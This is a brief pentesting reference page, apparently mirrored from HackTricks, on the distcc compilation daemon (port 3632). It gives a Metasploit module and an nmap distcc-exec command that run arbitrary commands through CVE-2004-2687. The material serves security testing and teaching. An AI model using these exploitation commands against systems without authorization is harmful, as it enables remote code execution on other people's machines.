mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
1,005 B
1,005 B
3632 - Pentesting distcc
Basic Information
Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
Default port: 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploitation
Check if it's vulnerable to CVE-2004-2687 to execute arbitrary code:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
Shodan
I don't think shodan detects this service.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Álex B (@r1p)